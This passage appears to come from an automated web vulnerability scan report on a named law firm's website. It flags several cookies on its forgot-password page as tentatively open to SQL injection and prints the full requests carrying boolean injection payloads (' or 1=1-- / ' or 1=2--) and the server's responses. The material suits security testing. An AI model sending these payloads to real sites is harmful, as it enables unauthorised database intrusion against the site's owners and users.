Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312242310'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.51. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 16096722'%20or%201%3d1--%20 and 16096722'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.2.10.130522975816096722'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 19:51:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.2.10.130522975816096722'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.52. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 12161077%20or%201%3d1--%20 and 12161077%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704612161077%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 17:53:21 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704612161077%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.53. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 24015633'%20or%201%3d1--%20 and 24015633'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman24015633'%20or%201%3d1--%20; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 17:52:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman24015633'%20or%201%3d2--%20; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.54. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hsfirstvisit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 46466794'%20or%201%3d1--%20 and 46466794'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4646466794'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 17:52:44 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4646466794'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.55. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotdt cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 18225561'%20or%201%3d1--%20 and 18225561'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A2718225561'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 17:52:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
